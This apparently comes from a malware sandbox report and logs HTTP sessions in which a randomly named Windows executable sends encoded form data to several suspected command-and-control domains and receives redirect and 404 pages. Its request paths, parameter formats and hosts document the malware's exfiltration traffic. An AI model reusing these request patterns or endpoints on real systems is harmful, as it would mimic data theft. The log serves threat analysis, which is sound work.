                                                                      10 | 192.168.2.8 | 49822 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:21.994709969 CET | 791 | OUT | POST /itly/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Origin: http://www.childlesscatlady.today
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.childlesscatlady.today/itly/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 6e 61 77 67 38 41 45 72 35 67 4c 45 59 63 59 31 2f 62 46 58 4c 53 50 39 64 55 33 6a 77 31 61 64 5a 4f 30 4c 6c 6e 52 47 77 4a 45 57 39 54 44 49 36 48 79 48 46 31 38 76 53 62 64 6f 47 36 67 2b 70 43 4f 56 38 69 69 75 4c 66 68 6f 48 50 46 71 78 41 75 74 31 44 6f 56 6c 66 59 2b 35 49 73 6a 57 5a 4c 46 41 76 69 44 42 67 72 70 36 6d 63 75 4d 52 68 37 66 61 4b 35 78 66 69 53 6e 61 7a 58 52 38 43 69 31 43 6e 41 67 51 7a 41 45 6e 4d 43 77 32 74 72 77 46 53 6e 4d 73 73 32 71 4c 74 41 34 4f 37 34 45 6a 65 4d 69 56 63 6a 62 5a 70 43 69 51
                                                                      Data Ascii: F2=gu6he7xKy/oLf8b2QMkFnjPuDSMBXLFuxJHcMRA6Xsnawg8AEr5gLEYcY1/bFXLSP9dU3jw1adZO0LlnRGwJEW9TDI6HyHF18vSbdoG6g+pCOV8iiuLfhoHPFqxAut1DoVlfY+5IsjWZLFAviDBgrp6mcuMRh7faK5xfiSnazXR8Ci1CnAgQzAEnMCw2trwFSnMss2qLtA4O74EjeMiVcjbZpCiQ


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      11 | 192.168.2.8 | 49838 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:24.540694952 CET | 1808 | OUT | POST /itly/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Origin: http://www.childlesscatlady.today
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.childlesscatlady.today/itly/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 2f 61 77 53 6b 41 46 4b 35 67 49 45 59 63 56 56 2f 65 46 58 4c 54 50 35 4a 51 33 6a 74 43 61 66 52 4f 32 75 78 6e 58 33 77 4a 65 47 39 54 63 59 36 61 32 48 46 67 38 76 69 68 64 6f 57 36 67 2b 70 43 4f 54 34 69 72 66 4c 66 79 34 48 41 4e 4b 78 32 34 74 31 6e 6f 56 74 70 59 2b 74 59 74 58 69 5a 4c 6b 77 76 6b 31 31 67 30 5a 36 6b 64 75 4e 4d 68 37 53 41 4b 35 74 35 69 53 54 67 7a 58 70 38 53 31 46 66 6a 79 78 47 69 77 51 41 49 31 6b 63 6f 62 49 38 51 58 59 38 76 6c 79 62 74 77 78 68 35 4b 45 30 65 62 2b 5a 41 43 62 72 67 53 62 38 2f 78 69 35 70 5a 33 72 44 58 48 56 6e 37 6f 4a 58 73 36 54 59 70 48 71 52 61 50 65 44 56 37 31 58 68 55 35 4f 66 2f 42 42 4d 35 73 30 61 65 72 31 47 5a 70 79 5a 53 46 69 76 61 43 6e 4d 64 6e 2f 37 74 42 33 53 78 65 77 46 75 51 4e 61 62 41 38 59 78 41 38 75 48 6a 77 66 35 4f 66 66 56 36 4d 57 4f 34 48 59 4c 65 44 34 31 43 79 73 44 43 64 38 50 [TRUNCATED]
                                                                      Data Ascii: F2= [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      12 | 192.168.2.8 | 49851 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:27.083715916 CET | 492 | OUT | GET /itly/?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:27.743560076 CET404INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 07 Nov 2024 14:28:27 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 264
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 32 3d 74 73 53 42 64 4c 41 36 67 76 38 34 59 38 47 63 59 75 67 2f 6a 44 43 79 43 77 38 59 4c 59 78 43 6c 5a 53 69 4f 41 30 47 58 4b 6e 57 38 43 73 75 45 62 51 39 59 46 77 66 61 47 50 53 4a 6c 57 63 50 5a 6c 56 32 54 64 70 4f 50 51 77 77 38 74 64 53 54 6f 75 46 55 46 6f 58 4e 47 76 33 6e 41 50 2b 38 50 4c 59 59 4c 58 6e 76 64 77 4a 6c 6b 69 31 2b 58 4c 36 4c 7a 69 44 35 6c 76 6a 50 45 4b 37 51 3d 3d 26 73 48 53 3d 35 34 33 68 41 70 77 48 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHD"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.8499553.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:47.170686007 CET750OUTPOST /szy7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Origin: http://www.doggieradio.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.doggieradio.net/szy7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 70 7a 4f 79 55 78 2f 6f 45 67 75 76 79 30 75 41 38 46 42 63 6f 2b 77 6d 4a 53 41 74 4f 47 5a 71 6e 64 64 79 67 6d 38 41 54 4c 6a 6e 2b 39 4c 46 56 62 76 64 47 39 7a 76 70 32 46 62 5a 6e 57 59 39 76 4c 44 4a 67 77 73 6e 42 4c 75 31 4f 62 47 32 5a 74 35 6f 75 2f 65 55 76 4b 64 49 6a 67 74 36 5a 44 49 66 38 68 6d 6d 2f 6a 55 33 34 49 75 4c 65 77 6a 44 34 44 62 38 6d 76 72 76 4c 76 5a 72 49 58 4a 6e 43 62 70 73 55 31 6f 6b 79 57 4c 58 36 61 4e 78 6a 71 6c 63 4d 38 53 51 6d 48 4e 35 6a 72 68 4f 54 57 74 37 4d 2f 37 6b 59 4b 63 43 57 44 30 32 2f 53 39 39 2b 49 3d
                                                                      Data Ascii: F2=H+5bRSq0NrhhpzOyUx/oEguvy0uA8FBco+wmJSAtOGZqnddygm8ATLjn+9LFVbvdG9zvp2FbZnWY9vLDJgwsnBLu1ObG2Zt5ou/eUvKdIjgt6ZDIf8hmm/jU34IuLewjD4Db8mvrvLvZrIXJnCbpsU1okyWLX6aNxjqlcM8SQmHN5jrhOTWt7M/7kYKcCWD02/S99+I=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.8499693.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:49.732711077 CET770OUTPOST /szy7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Origin: http://www.doggieradio.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.doggieradio.net/szy7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 6f 54 65 79 58 51 2f 6f 55 77 75 73 72 30 75 41 32 6c 42 51 6f 2b 38 6d 4a 54 30 39 4f 7a 4a 71 6e 38 74 79 68 69 67 41 61 62 6a 6e 31 64 4c 63 49 72 75 54 47 39 2f 52 70 7a 39 62 5a 6e 43 59 39 75 58 44 4f 58 4d 72 6f 78 4c 73 34 75 62 45 79 5a 74 35 6f 75 2f 65 55 73 32 33 49 6c 49 74 6d 35 54 49 5a 64 68 6c 6c 2f 6a 62 79 34 49 75 61 4f 77 76 44 34 44 31 38 69 75 38 76 49 58 5a 72 4d 54 4a 67 58 6e 75 6c 55 31 75 71 53 58 31 59 2f 6e 68 76 52 6d 43 53 66 51 77 59 47 44 47 38 56 47 4c 55 78 65 72 34 4d 58 51 6b 62 69 71 48 68 65 63 73 63 43 4e 6a 70 64 5a 46 53 63 64 49 6a 43 4d 4f 31 57 7a 32 61 45 45 33 43 51 61
                                                                      Data Ascii: F2=H+5bRSq0NrhhoTeyXQ/oUwusr0uA2lBQo+8mJT09OzJqn8tyhigAabjn1dLcIruTG9/Rpz9bZnCY9uXDOXMroxLs4ubEyZt5ou/eUs23IlItm5TIZdhll/jby4IuaOwvD4D18iu8vIXZrMTJgXnulU1uqSX1Y/nhvRmCSfQwYGDG8VGLUxer4MXQkbiqHhecscCNjpdZFScdIjCMO1Wz2aEE3CQa


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.8499813.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:52.278417110 CET1787OUTPOST /szy7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Origin: http://www.doggieradio.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.doggieradio.net/szy7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 6f 54 65 79 58 51 2f 6f 55 77 75 73 72 30 75 41 32 6c 42 51 6f 2b 38 6d 4a 54 30 39 4f 77 70 71 6e 75 31 79 67 44 67 41 41 62 6a 6e 34 39 4c 5a 49 72 75 65 47 38 58 4e 70 7a 35 68 5a 6c 36 59 37 4d 7a 44 50 6a 59 72 7a 42 4c 73 6b 65 62 46 32 5a 74 57 6f 75 76 61 55 73 6d 33 49 6c 49 74 6d 38 66 49 5a 4d 68 6c 6a 2f 6a 55 33 34 4a 68 4c 65 77 4c 44 34 62 44 38 69 69 73 76 34 33 5a 73 6f 33 4a 6c 68 7a 75 6e 30 31 73 70 53 58 39 59 2f 6a 2b 76 52 36 6b 53 65 6b 4b 59 45 44 47 2f 42 54 73 49 56 71 6f 37 75 48 2f 6b 35 2f 4d 63 47 75 67 79 65 57 78 70 75 39 4c 43 44 73 36 48 6a 65 66 62 33 6e 42 68 63 77 51 78 32 35 4e 58 74 72 6c 78 71 79 4f 51 2f 62 46 56 6b 77 38 6f 6d 61 52 62 79 71 47 61 7a 78 49 62 49 51 6a 54 68 31 4f 39 69 32 39 35 59 4d 4d 6a 56 61 51 32 34 6e 54 54 31 67 77 32 63 59 34 38 76 5a 68 31 49 59 64 51 63 74 41 7a 51 48 42 36 42 73 4b 6f 7a 4d 38 75 41 7a 67 2b 7a 70 42 44 53 43 79 72 4e 77 2b 70 51 69 50 70 50 78 68 66 36 32 44 64 54 41 [TRUNCATED]
                                                                      Data Ascii: F2=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 [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.8499933.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:54.822185993 CET485OUTGET /szy7/?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:55.476773977 CET404INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 07 Nov 2024 14:28:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 264
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 32 3d 4b 38 52 37 53 6e 53 66 62 37 64 6c 69 33 65 58 52 41 44 33 53 6e 6e 74 73 56 53 53 6a 31 5a 43 6a 73 52 6c 43 7a 49 73 44 57 4a 55 78 63 6c 63 67 7a 56 59 54 71 37 66 36 4e 37 2f 55 4b 6a 54 42 70 50 58 33 57 56 6f 50 48 2f 76 30 74 6a 35 44 6d 6b 32 7a 79 4f 31 78 4b 54 69 7a 36 6f 42 72 4e 75 34 52 73 33 53 47 42 63 54 72 70 54 71 44 65 4a 39 70 50 4c 57 33 36 67 68 57 2b 31 31 52 77 3d 3d 26 73 48 53 3d 35 34 33 68 41 70 77 48 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHD"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.849994199.192.19.19805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:00.684931040 CET738OUTPOST /azuc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Origin: http://www.demovix.xyz
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.demovix.xyz/azuc/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 46 47 75 55 66 75 67 39 59 79 56 51 35 4c 73 56 64 5a 4b 78 45 4c 49 45 4e 4b 5a 51 64 50 52 6e 43 48 4c 49 66 53 53 46 78 56 58 4f 4d 30 2b 32 52 34 57 35 43 41 6e 4d 45 4d 56 63 47 65 4f 37 51 79 4b 57 31 61 70 71 63 6e 52 4b 31 67 47 49 65 34 4d 76 30 41 78 38 79 67 70 41 47 47 30 41 35 65 56 54 48 43 76 61 6d 34 45 36 77 79 4a 35 70 47 6b 72 45 37 7a 61 73 66 45 41 38 74 52 35 57 6b 78 72 4e 34 49 57 47 62 78 47 36 65 4c 74 4d 46 4e 69 36 70 31 52 4f 45 72 48 71 50 59 72 75 72 46 31 4c 75 53 68 4e 71 72 78 6b 67 76 7a 31 56 2f 44 34 58 69 6d 65 6a 63 43 77 54 71 63 67 50 31 6c 50 63 6f 3d
                                                                      Data Ascii: F2=FGuUfug9YyVQ5LsVdZKxELIENKZQdPRnCHLIfSSFxVXOM0+2R4W5CAnMEMVcGeO7QyKW1apqcnRK1gGIe4Mv0Ax8ygpAGG0A5eVTHCvam4E6wyJ5pGkrE7zasfEA8tR5WkxrN4IWGbxG6eLtMFNi6p1ROErHqPYrurF1LuShNqrxkgvz1V/D4XimejcCwTqcgP1lPco=
                                                                      Nov 7, 2024 15:29:01.378232002 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:01 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                      Nov 7, 2024 15:29:01.378258944 CET1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                      Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                      Nov 7, 2024 15:29:01.378271103 CET1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                      Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                      Nov 7, 2024 15:29:01.378278017 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                      Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                      Nov 7, 2024 15:29:01.378283978 CET848INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                      Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                      Nov 7, 2024 15:29:01.378312111 CET1236INData Raw: 20 20 20 20 20 20 78 31 3d 22 32 32 37 2e 35 35 22 20 79 31 3d 22 32 39 35 2e 31 38 39 22 20 78 32 3d 22 32 33 35 2e 33 38 37 22 20 79 32 3d 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20
                                                                      Data Ascii: x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="2
                                                                      Nov 7, 2024 15:29:01.378329039 CET1236INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79
                                                                      Data Ascii: troke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" s
                                                                      Nov 7, 2024 15:29:01.378344059 CET1236INData Raw: 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74
                                                                      Data Ascii: le fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="roun
                                                                      Nov 7, 2024 15:29:01.378359079 CET1236INData Raw: 2d 31 31 35 2e 33 34 2c 33 38 2e 32 31 38 63 2d 32 2e 32 38 2d 30 2e 30 34 38 2d 34 2e 39 32 36 2d 30 2e 32 34 31 2d 37 2e 38 34 31 2d 30 2e 35 34 38 0a 09 09 09 63 2d 36 38 2e 30 33 38 2d 37 2e 31 37 38 2d 31 33 34 2e 32 38 38 2d 34 33 2e 39 36
                                                                      Data Ascii: -115.34,38.218c-2.28-0.048-4.926-0.241-7.841-0.548c-68.038-7.178-134.288-43.963-167.33-103.87c-0.908-1.646-1.793-3.3-2.654-4.964c-18.395-35.511-37.259-83.385-32.075-118.817" /> <path id="backpack" fill="#FFFFFF" stroke="#0E0
